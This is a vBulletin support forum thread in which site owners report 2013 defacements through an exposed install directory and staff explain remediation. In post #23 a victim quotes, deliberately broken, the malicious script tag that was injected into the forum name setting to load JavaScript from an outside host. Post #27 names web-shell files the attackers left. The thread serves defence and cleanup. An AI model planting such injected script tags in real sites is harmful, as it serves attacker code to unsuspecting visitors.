Announcement

Collapse
No announcement yet.

4.1.1 Forum HACKED by Syrian Sympathizers

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    I was hacked all so last night. My host said this,

    It appears this was a typical post sent to the ajax on the back-end. These are taken care of by normal ModSecurity rules, but ModSecurity rules were set to defaults. As such, I've enabled additional ModSecurity rules to protect against this and many other common attack types, so this exact issue shouldn't happen again.



    Here's the POST performed by that user:



    "POST /forum/acp1/ajax.php

    Comment


    • #17
      Sorry for hi jacking the thread but i was also hacked, my sie is working but right now when i was in admincp i clicked one of the help icons and it takes me to a team hacker egyt directory of my server. What should i do now??

      Comment


      • #18
        Got a return hack today as well. I keep circling back to the question of how vBulletin could ship commercial software with such a gaping security hole.

        Comment


        • #19
          This happened to me tonight and I tried to clear this by upgrading to 4.2.2 and all heck broke loose and I got errors all over the place. What can I do now? Thanks.
          Nelson
          www.Hobby-Machinist.com

          Comment


          • #20
            Originally posted by Richard Tafoya View Post
            Got a return hack today as well. I keep circling back to the question of how vBulletin could ship commercial software with such a gaping ******ty hole.
            And no email was sent to EVERY owner whose email address they have in their files warning to REMOVE the INSTALL directory BEFORE we were all hacked. By the time I got the message in the Admincp, the SEA had already hacked my site. To be clear, I don't blame the mods here or the support staff, they did their best to help us afterwards, and they did. What was management thinking in NOT contacting everyone beforehand? I was up till 5am restoring the site and working to fix the damage.
            Nelson
            www.Hobby-Machinist.com

            Comment


            • #21
              Originally posted by helal_ph View Post
              Now I have some questions:
              1- How can some reach the install folder , without knowing my ftp username and pass?
              2- If they can reach the admincp, can they reach this install folder?
              3- If install folder has no value,why vbulletin team did not instruct to delete it after installation. They instruct to delet only the install.php

              thank you
              1) It has nothing to do with FTP... Delete the FOLDER. It is the only way to prevent access.

              2) Yes... If it is on your server they can reach it. This is why in no uncertain terms you should delete the folder like we've told you to do so.

              3) It has value. However all instructions have been updated to delete the folder. You should do so immediately.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API - Full / Mobile
              Vote for your favorite feature requests and the bugs you want to see fixed.

              Comment


              • #22
                Originally posted by Allthumbz View Post

                And no email was sent to EVERY owner whose email address they have in their files warning to REMOVE the INSTALL directory BEFORE we were all hacked. By the time I got the message in the Admincp, the SEA had already hacked my site. To be clear, I don't blame the mods here or the support staff, they did their best to help us afterwards, and they did. What was management thinking in NOT contacting everyone beforehand? I was up till 5am restoring the site and working to fix the damage.
                The issue was introduced in 4.1.0. That was released over 3 years go. Even if we emailed before we confirmed it, you're site was already at risk. As it is, most people are simply disregarding the email anyway.
                Translations provided by Google.

                Wayne Luke
                The Rabid Badger - a vBulletin Cloud demonstration site.
                vBulletin 5 API - Full / Mobile
                Vote for your favorite feature requests and the bugs you want to see fixed.

                Comment


                • #23
                  Just reporting that this morning, Sunday Sep. 15, my forum 4.2.0 PL 2 was also hacked.

                  At this point it should be find for me to deal with ... just reporting. I will stage the latest 4 version and switch everything to the new files.

                  BUT ... how can I be sure that the problem is really fixed, even with the upgrade to 4.2.1?

                  The hacker used the username "lasttouch". lasttouch apparently registered as there is a registration date of today about 7 am ET, then accessed the Admin CP and promoted itself to Admin. Found some "hacker login code" as well that was the way into the Admin CP, I'm guessing.

                  I am not a hacker myself so I don't really know what I'm looking for ... I haven't really investigated thoroughly, but so far all I've found is inputting the
                  ​Admin CP > Settings > Options > Site Name /URL/Contact > "Forum Name" box
                  with this script: (I added [invalidating code]just in case )

                  <script [invalidating code] src="http://kenningautoglass.co.za/wp-content/themes/famous/megaframe/megapanel/inc/lasttouch.js"></script>

                  So ... the hacker interfered with access, displayed a sort of medieval crest image that is so small and pixelated I can't read it, and a message "lasttouch was here".

                  Advice on making sure the LATEST version vb is secure is most welcome.

                  Comment


                  • #24
                    One related question. If you remove install, you cannot run the fix unique index function in maintenance. You get this error:
                    Help
                    Fix Unique Indexes
                    If for whatever reason the UNIQUE indexes in your database have been lost (usually this happens after importing an incomplete or corrupt SQL dump) you may find strange behavior, particularly when using the language and template systems.

                    This system will attempt to correct the problem and rebuild your UNIQUE indexes.

                    Please ensure that the mysql-schema.php file is present in the install folder on your web server before continuing.
                    Nelson
                    www.Hobby-Machinist.com

                    Comment


                    • #25
                      Was hacked today. Second time in a week. First time is was the Syrians and they put a notice. I didn't delete the install directory unfortunately. This time I cannot seem to get the hacker message off the forumhome.

                      -uploaded all new files
                      -deleted all new admin accounts
                      -deleted install dir
                      -checked modified files on server - nothing from this week
                      -checked announcements and notices and there is nothing new
                      -checked site name / URL / contact details page nothing there.
                      -disabled all plugins

                      My forum homepage is still the hacker message. How did he do this?

                      Edit: found some suspicious plugins in the vbulletin product delted them. Message still there.

                      Edit: It was the style that was edited. I reverted to another style and it got rid of the message.
                      Last edited by DannyITR; Thu 19th Sep '13, 9:34am.
                      Danny
                      My Site ---->www.montrealracing.com

                      Comment


                      • GuitarsCanada
                        GuitarsCanada commented
                        Editing a comment
                        I was just hacked by these syrians as well, wiped me clean, all files deleted except for some kind of page they put up. I am wiped clean

                    • #26
                      Edit your FORUMHOME template and check it for extra code. If no extra code, just save it anyway.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API - Full / Mobile
                      Vote for your favorite feature requests and the bugs you want to see fixed.

                      Comment


                      • #27
                        I got hacked today. They deleted everything in my public_html directory and uploaded a bunch of their own files, which I suspect allowed others access.

                        The files they left were named;
                        index.php
                        cx.php
                        xxx.php (which appears to be some sort of access panel for my server!)
                        inbox php mailer 2013.php

                        See attached image of my hacked homepage.

                        I have a dedicated server with a bunch of different domains and sites including another vbulletin 4.x site.

                        The other vbulletin 4.x site was not defaced or visibly damaged but they also managed to access cpanel for the both domains that have the vbulletin4.x sites and used the other domain to send out spam, but the email addresses they were sending to do not appear to be our forum members.

                        I'm not sure what version of vbulletin was running on the site they deleted but I think it was below 4.2.1. The other site is running 4.2.0 PL2

                        In both cases the Install directory was NOT present, (we were hack previously and learned from that!).

                        The database belonging to the site that they deleted is still in place and it is reasonably easy to restore that site, but could they have left some sort of back door in the database?

                        Ditto for the site that is still intact - I am concerned that they may have left some sort of back door for later.
                        Attached Files

                        Comment

                        Related Topics

                        Collapse

                        Working...
                        X